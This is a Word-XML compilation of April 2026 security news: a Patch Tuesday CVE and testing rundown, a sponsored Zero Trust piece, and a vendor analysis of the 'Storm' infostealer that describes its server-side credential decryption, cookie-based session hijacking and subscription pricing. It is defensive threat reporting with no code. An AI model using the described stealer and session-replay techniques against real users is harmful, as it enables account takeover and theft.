        <w:t>Run COM Automation workflows - VBA, PowerShell, and Office automation - and confirm they execute correctly. Hyper-V and virtualization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April patches both Hyper-V compute layers (computecore.dll, vmcompute.dll, vmwp.exe), along with the hypervisor binary (hvax64.exe) for Windows 11 25H2 and 24H2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Start, save, resume, and stop a VM using Hyper-V Manager or PowerShell and repeat the cycle multiple times.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Export a VM, import it, and confirm the imported VM boots and runs normally. Launch Windows Sandbox and confirm it starts without error. Windows Installer, Cloud Sync and MDM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April updates to Windows Installer (msi.dll), the Cloud Files filter (cldflt.sys), and the MDM management layer affect installation workflows, cloud sync, and device management.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Install, uninstall, and repair MSI packages to verify Windows Installer functions correctly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Connect and disconnect your cloud sync provider (e.g. OneDrive) multiple times and confirm sync functions after restarts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enroll a device in Intune or your MDM solution, verify compliance status, and trigger a policy sync. Common Log File System and storage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Common Log File System driver (clfs.sys) - subject of March's major hardening change - picks up a follow-up patch. Storage Spaces (spaceport.sys) and app isolation file system drivers (bfs.sys, wcifs.sys) also receive updates this cycle.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Run Windows Update install and rollback cycles, then power-cycle the machine multiple times to confirm the system boots normally each time. Install and uninstall a set of representative applications through multiple cycles and confirm each completes without error.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Perform a backup using your normal solution, restore from it, and verify data integrity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>If using Storage Spaces, create a pool with mirrored and thin virtual disks, write data, and verify clean deletion. Office and SharePoint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April's Office updates target MSI editions: Excel 2016 (KB5002860), PowerPoint 2016 (KB5002808), Office 2016 shared libraries (KB5002859), and SharePoint Server 2016, 2019, and Subscription editions. These will not install on Click-to-Run deployments such as Microsoft 365 Apps.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Open and edit complex Excel workbooks with formulas, macros, and external data connections; save and reopen to verify integrity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create and edit PowerPoint presentations with embedded media and transitions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Across all patched server editions, validate SharePoint document library operations, co-authoring, and workflow execution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Verify that Office add-ins and line-of-business applications integrating with Office continue to operate correctly.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April's two High Risk components should top every testing queue. Kerberos changes could disrupt long-running services using RC4 keytabs; monitor event IDs 201-209 and keep rollback plans ready. The Remote Desktop client update warrants thorough validation of clipboard, printer redirection, and session reconnection, particularly in RDP-dependent environments. Secure Boot and BitLocker validation remains essential as CVE-2023-24932 key rolling continues. Five patches to the Projected File System driver elevate cloud sync testing this cycle. The dual afd.sys updates and VPN/IPsec patches warrant regression testing across remote-access infrastructure. Office updates are confined to MSI editions.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Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: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Browsers (Microsoft IE and Edge) Microsoft Windows (both desktop and server) Microsoft Office Microsoft Exchange and SQL Server Microsoft Developer Tools (Visual Studio and .NET) Adobe (if you get this far) Browsers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Microsoft's browsers look quiet this month. Two Microsoft-authored Edge spoofing fixes both ride the standard Edge update channel: CVE-2026-33119 (Edge for Android, CVSS 5.4, moderate) and CVE-2026-33118 (CVSS 4.3, low).</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real story is upstream: 140+ Chromium fixes in the past month, including CVE-2026-5281 - a use-after-free in Dawn that Google has confirmed is actively exploited in the wild. We recommend you patch now for all Chromium endpoints (here's looking at you, Edge).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Microsoft Windows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Microsoft delivers 134 Windows CVEs across desktop and server - four critical, the rest important or moderate, with no zero-days or publicly disclosed flaws this cycle. Headline by raw CVSS is a 9.8 IKE/IPsec RCE; priority by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exploitability is the Active Directory RCE - the only Windows critical Microsoft rates "Exploitation More Likely." The four critical- rated issues are concentrated in three Windows areas: Active Directory, networking (two flaws), and Remote Desktop Client.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Active Directory / Identity - CVE-2026-33826, RCE in Active Directory via improper input validation (CVSS 8.0, critical; Exploitation More Likely). An authenticated low-privilege attacker on an adjacent network can execute code on a domain controller - your entire directory service is the surface. This is a priority for anyone running AD on-prem.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Networking (IKE/IPsec) - CVE-2026-33824, RCE in IKE Service Extensions via double-free (CVSS 9.8, critical; Less Likely). Highest CVSS in the cycle: unauthenticated, network-callable, no UI. Patch VPN concentrators and IPsec gateways first.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Networking (TCP/IP) - CVE-2026-33827, RCE via race condition in the TCP/IP stack (CVSS 8.1, critical; Less Likely). Network-callable, but the race lifts attack complexity (AC:H).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote Desktop Client - CVE-2026-32157, RCE via use-after-free (CVSS 8.8, critical; Less Likely). Triggered when a user connects to a malicious RDP server (UI:R) - the threat model is reverse RDP, not inbound. Flag for jump- host operators.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Beyond the criticals, the standout Windows flaw is CVE-2026-27912 - Kerberos elevation of privilege via improper authorization (CVSS 8.0, important). Authorized attackers on an adjacent network can elevate through the Kerberos handler. Coordinate domain-controller deployment with the Kerberos RC4 Phase 2 hardening covered in the lifecycle section; both touch domain controllers. The Kerberos flaw (CVE-2026-27912) pushes April's Windows updates to Patch Now. Microsoft Office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Office receives 14 security fixes, three rated critical and one actively exploited in the wild. The active SharePoint exploit forces Office to Patch Now, with SharePoint servers taking priority over the client push.</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CVE-2026-32201 - Microsoft SharePoint Server - Spoofing, actively exploited in the wild (CVSS 6.5, important). The score understates the urgency: exploitation has been confirmed, and a spoofing flaw inside SharePoint is a platform for credential theft and lateral movement regardless of internal- only posture. Patch immediately, ahead of the Office client push.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2026-32190 - Microsoft Office - Remote code execution (CVSS 8.4, critical). The Preview Pane remains the attack vector; previewing a crafted file in Outlook or File Explorer is sufficient to trigger execution without further user action. As we've noted before, this keeps recurring.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2026-33114, CVE-2026-33115 - Microsoft Word - Remote code execution (both CVSS 8.4, critical). Paired Word RCEs on the same release channel; affected surface matches CVE-2026-32190.</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Excel carries the heaviest cluster - four additional RCEs: CVE-2026-32189, CVE-2026-32197, CVE-2026-32198, and CVE-2026-32199, plus an information- disclosure flaw in CVE-2026-32188. Microsoft Word picks up two fixes outside the critical pair: RCEs CVE-2026-33095 and CVE-2026-23657, and information disclosure CVE-2026-33822. This is a Patch Now release for Office, driven by the SharePoint zero-day. Organizations that cannot deploy Office clients quickly should consider disabling the Preview Pane in Outlook and File Explorer as a temporary mitigation against the critical RCE trio. Microsoft Exchange and SQL Server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Exchange Server picks up zero CVEs this month, a rare quiet cycle, and the right window to clear any deferred CU work. SQL Server gets three, including a network RCE that grants SQL sysadmin on success: CVE-2026-33120 - Microsoft SQL Server - Remote code execution via untrusted pointer dereference (CVSS 8.8, important; Exploitation Less Likely). Authenticated attackers get full SQL sysadmin on success. Scope is unusually narrow: only SQL Server 2022 for x64-based Systems on the GDR servicing branch - CU 24 and every other supported version (2016 SP3 through 2025) are not listed as affected.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2026-32167, CVE-2026-32176 - Microsoft SQL Server - Elevation of privilege via SQL injection (both CVSS 6.7, important). Paired flaws affecting SQL Server 2016 SP3 through 2025 on both GDR and CU branches. Local EoP, not remote - the concern is breadth, not blast radius.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Readiness team recommends Patch Now for any SQL Server 2022 GDR operation. Schedule the wider SQL footprint with your normal database- maintenance window.</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Developer tools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are 10 CVEs in Developer Tools this month, headlined by a critical- rated .NET Framework DoS and two GitHub-attributed flaws that will affect developer workflows directly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2026-23666 - .NET Framework - Denial of service via improper input validation (CVSS 7.5, critical; Exploitation Less Likely). The critical rating despite a DoS impact reflects exploit-code maturity; the CVSS vector includes E:P (proof-of-concept).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2026-32631 - Visual Studio - NTLM hash leak via git clone from manipulated repositories (CVSS 7.4, important). GitHub-attributed: cloning a malicious repo or checking out a branch that resolves to an attacker- controlled UNC path leaks the user's NTLM hash. Affects Visual Studio 2017, 2019, and 2022 (17.12 and 17.14).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CVE-2026-26143 - PowerShell - Security feature bypass (CVSS 7.8, important). Highest CVSS in the set, and PowerShell SFBs always merit attention.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Five more developer-related updates round out the cycle: four .NET / Visual Studio DoS or spoofing fixes (CVE-2026-26171, CVE-2026-32178, CVE-2026- 32203, CVE-2026-32226) and a moderate TLS PSK/ALPN bypass (CVE-2026-21637). None have been disclosed or exploited. The Readiness team recommends Patch Now for .NET Framework and PowerShell.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Adobe (and third-party updates)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Microsoft no longer ships Adobe updates as part of its bulletin. Adobe ships APSB26-44 separately for Acrobat and Reader - two listed as critical. They are worth your attention, given Reader's prevalence on enterprise desktops. For anyone packaging, testing and deploying these recent and rapid Adobe releases: we hear you. The packages are big, and the management effort keeps growing.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Greg Lambert Contributor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Follow Greg Lambert on X Follow Greg Lambert on LinkedIn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Greg Lambert is an evangelist for Application Readiness, the online assessment and application conversion specialists. Greg is a co-founder of ChangeBASE, and now CEO of Application Readiness, and has considerable experience with application packaging technology and its deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ComputerWorld 2026.04.17 22:42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.computerworld.com/article/4160481/microsofts-patch-tuesday-release-for-april-is-a-whopper.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5 Ways Zero Trust Maximizes Identity Security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by Specops Software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April 14, 2026 10:02 AM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Stolen credentials accounted for 22% of known initial access vectors in 2025. It's the most common way for attackers to breach a network, and once inside, excessive permissions and limited visibility often allow them to escalate unchecked.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Zero Trust is positioned as the answer. In theory, removing implicit trust and requiring every access request to be verified should improve security. But in practice, simply adopting Zero Trust principles isn't enough.</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If it's implemented as a set of isolated controls rather than a cohesive identity strategy, gaps remain, and attackers will find them.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 truly strengthen identity security, Zero Trust must be applied with identity at its core: tightly governed, continuously validated, and fully visible across the environment. The following five approaches show how a well-executed Zero Trust model strengthens identity security in practical, measurable ways. 1. Enforcing least privilege access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It's common for users to accumulate permissions over time as roles change, projects evolve, or temporary access isn't revoked. The result is a level of access that far exceeds what users actually need for their job.</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If attackers compromise that account, they inherit those same privileges, giving them a broader foothold from the outset.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Zero Trust applies the principle of least privilege to limit that exposure. Access is contingent upon specific requirements, rather than broad or permanent permissions. That means just-in-time access and time-bound privileges, with strict segmentation between systems and data.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If credentials are stolen, the potential impact is then contained.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Attackers are far less able to escalate privileges or access sensitive systems, reducing both the likelihood and severity of a breach.</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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 4+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free 2. Continuous, context-aware authentication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Zero Trust environment, treating authentication as a one-time event at login is a dangerous oversight. Attackers now use session hijacking and token theft to bypass initial checks entirely, moving through the network under the guise of a legitimate user.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often leverage compromised devices to blend in with normal activity, remaining invisible to traditional security triggers.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Organizations need continuous, context-aware authentication to address this gap. Instead of relying solely on credentials, device health should also influence access decisions.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Solutions like Specops Device Trust deliver that assurance. By binding identities to trusted devices, it prevents attackers from using passwords on their own hardware or unknown virtual environments.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If a device falls out of compliance, such as through a disabled firewall or missed update, users are prompted to fix it, and access can be restricted or revoked until they do.</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Additionally, Specops Device Trust supports Windows, macOS, Linux, iOS, and Android, enabling consistent device trust across an organization's entire network, including BYOD and third-party devices.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adds a crucial layer to identity security as credentials are far harder to abuse without a trusted device. 3. Limiting lateral movement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Zero Trust is designed to disrupt an attacker's progression from initial compromise to privileged access. This involves segmenting access at a granular level and continuously verifying identity for each new request, rather than allowing unrestricted movement within the network.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Even users with legitimate access are limited to only the systems and data required for their role. This means that should an account be breached, the attacker's ability to explore the environment, escalate privileges, or reach high-value assets is constrained at every step.</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practice, this containment can be the difference between a minor incident and a large-scale breach, turning what could have been widespread compromise into a far more manageable security event. 4. Securing remote work and third-party access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Remote work and third-party collaboration have become standard, but they also introduce additional identity risk. Employees are logging in from unmanaged devices and networks, alongside vendors and partners.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traditional models, this access is frequently overprovisioned or insufficiently monitored, creating gaps that attackers can exploit. A compromised third-party developer account, for example, offers a direct route into sensitive environments.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Zero Trust addresses this by treating every user and device as untrusted by default. Access is granted based on verified identity, device posture, and context, rather than network location or assumed trust.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allows organizations to apply consistent security controls across all access points. Third-party users can be restricted to specific systems; sessions can be monitored more closely, and access can be revoked as soon as it's no longer needed. 5. Centralized identity governance and monitoring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 identity environments grow, so does the challenge of maintaining visibility and control. Particularly in larger organizations, users, roles, applications, and permissions are spread across multiple systems, making it difficult for security teams to see who has access to what at any given time.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Zero Trust brings identity governance and monitoring into a more centralized model. Security teams can manage access policies, authentication events, and user activity from a single point, rather than in isolation.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Unusual access patterns, privilege changes, or policy violations can be detected and investigated more quickly, reducing the time attackers have to operate undetected. Implementing Zero Trust identity security in your organization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Moving toward a Zero Trust model is a journey, not a weekend project. You don't have to overhaul everything at once. Most organizations find the most immediate success by prioritizing phishing-resistant multi-factor authentication and device health checks first.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starting with these high-impact controls, you can secure your most vulnerable entry points while gradually tightening least-privilege policies across the rest of your infrastructure.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Interested in seeing how Specops' identity security services can help your organization move towards true Zero Trust authentication?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Contact us today or book a demo to see our solutions in action.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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.04.14 19:02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/5-ways-zero-trust-maximizes-identity-security/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The silent "Storm": New infostealer hijacks sessions, decrypts server-side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by Varonis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April 13, 2026 10:05 AM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new infostealer called Storm appeared on underground cybercrime networks in early 2026, representing a shift in how credential theft is developing. For under $1,000 a month, operators get a stealer that harvests browser credentials, session cookies, and crypto wallets, then quietly ships everything to the attacker's server for decryption.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 understand why enterprises should care, it helps to know what changed. Stealers used to decrypt browser credentials on the victim's machine by loading SQLite libraries and accessing credential stores directly. Endpoint security tools got good at catching this, making local browser database access one of the clearest signs that something malicious was running.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Then Google introduced App-Bound Encryption in Chrome 127 (July 2024), which tied encryption keys to Chrome itself and made local decryption even harder. The first wave of bypasses involved injecting into Chrome or abusing its debugging protocol, but those still left traces that security tools could pick up.</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Stealer developers responded by stopping local decryption altogether and shipping encrypted files to their own infrastructure instead, removing the telemetry most endpoint tools rely on to catch credential theft.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Storm takes this approach further by handling both Chromium and Gecko-based browsers (Firefox, Waterfox, Pale Moon) server-side, where StealC V2 still processes Firefox locally.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Collected data includes everything attackers need to restore hijacked sessions remotely and steal from their victims: saved passwords, session cookies, autofill, Google account tokens, credit card data, and browsing history.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One compromised employee browser can hand an operator authenticated access to SaaS platforms, internal tools, and cloud environments without ever triggering a password-based alert.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Cookie restore and session hijacking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Once Storm has decrypted the browser data, stolen credentials and session cookies are dumped directly into the operator's panel. Where most stealers require buyers to manually replay stolen logs, Storm automates the next step.</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Feed in a Google Refresh Token and a geographically matched SOCKS5 proxy, and the panel silently restores the victim's authenticated session.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Varonis Threat Labs has covered this class of attack before. Our Cookie- Bite research demonstrated how stolen Azure Entra ID session cookies render MFA irrelevant, giving attackers persistent access to Microsoft 365 without ever needing a password.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SessionShark analysis showed how phishing kits intercept session tokens in real time to defeat Microsoft 365 MFA. Storm's cookie restore is the same underlying technique, productised and sold as a subscription feature.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Introducing Varonis Interceptor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AI introduces a new breed of email threats that are more deceptive than ever. Varonis Interceptor is the AI-native email security solution built to stop today's most sophisticated threats before they ever reach your inbox.</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Watch the Interceptor webinar to see how Varonis enables true AI-powered security outcomes. Wach the Webinar Collection and infrastructure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Beyond credentials, Storm grabs documents from user directories, pulls session data from Telegram, Signal, and Discord, and targets crypto wallets through both browser extensions and desktop apps. System information and screenshots are captured across multiple monitors. Everything runs in memory to reduce the chance of detection.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 the infrastructure side, operators connect their own virtual private servers (VPS) to Storm's central servers, routing stolen data through infrastructure they control rather than a shared platform. This keeps the central servers insulated from takedown attempts, because law enforcement or abuse reports hit the operator's node first.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Team management supports multiple workers with permissions covering log access, build creation, and cookie restoration, so a single Storm licence can support a small cybercriminal operation with divided responsibilities.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Domain detection auto-labels stolen credentials by service, with rules visible for Google, Facebook, Twitter/X, and cPanel, making it straightforward for operators to filter and prioritise the accounts they want to exploit first.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Active campaigns and pricing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At the time of investigation, the logs panel contained 1,715 entries spanning India, the US, Brazil, Indonesia, Ecuador, Vietnam, and several other countries. Whether all of these represent real victims or include test data is difficult to confirm from panel imagery alone, but the varied IPs, ISPs, and data sizes look consistent with active campaigns.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Credentials tagged to Google, Facebook, Twitter/X, Coinbase, Binance, Blockchain.com, and Crypto.com appear across multiple entries, the kind of data that typically ends up on the credential marketplaces that feed account takeover, fraud, and initial access for more targeted intrusions.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Storm is sold on a tiered subscription: $300 for a 7-day demo, $900/month standard, $1,800/month for a team license with 100 operator seats and 200 builds. A crypter is required on top.</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Builds keep running after a subscription expires, so deployed stealers continue harvesting data regardless of the operator's license status.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Detecting stolen sessions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Storm is consistent with a broader shift in the stealer market. Server-side decryption enables attackers to avoid tripping endpoint tools designed to catch traditional on-device decryption, and session cookie theft has been replacing password theft as the primary objective for a while now.</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credentials and sessions that stealers like Storm harvest are the start of what comes next: logins from unfamiliar locations, lateral movement, and data access that breaks established patterns. Indicators of compromise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Forum handle: StormStealer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Forum ID: 221756</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Account registered: 12/12/25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Current version: v0.0.2.0 (Gunnar)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Build characteristics: C++ (MSVC/msbuild), ~460 KB, Windows only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article originally appeared on the Varonis blog.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and written by Varonis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.04.13 19:02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/the-silent-storm-new-infostealer-hijacks-sessions-decrypts-server-side/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Week in review: Windows zero-day exploit leaked, Patch Tuesday forecast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Here's an overview of some of last week's most interesting news, articles, interviews and videos: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Cloudflare moves up its post-quantum deadline as researchers narrow the path to Q-Day Cloudflare announced it is targeting 2029 to complete post-quantum security across its entire product suite, including post-quantum </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>authentication. The company is following a revised roadmap that Google also adopted after announcing that it had improved the quantum algorithm used to break elliptic curve cryptography. Google stopped short of publishing the algorithm, disclosing only a zero-knowledge proof of its existence.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6G network design puts AI at the center of spectrum, routing, and fault management Wireless network operators are preparing for a generation of infrastructure where AI is built into the architecture from the start. Sixth-generation networks, expected to reach commercial development over the coming decade, are being designed with AI at the center of how spectrum is allocated, traffic is routed, and failures are detected.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managing partners should ask AI vendors before signing any contract In this Help Net Security interview, Kumar Ravi, Chief Security &amp; Resilience Officer at TMF Group, argues that over-privileged access and weak workflow controls pose more danger than ransomware attacks, precisely because they accumulate quietly and go unnoticed.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Chaos malware expands from routers to Linux cloud servers Chaos, Go-based malware first documented by Lumen's Black Lotus Labs, has historically targeted routers and edge devices. A new variant observed in March 2026 shows the malware operating against misconfigured Linux cloud servers, a category of infrastructure the botnet had not previously prioritized.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Asqav: Open-source SDK for AI agent 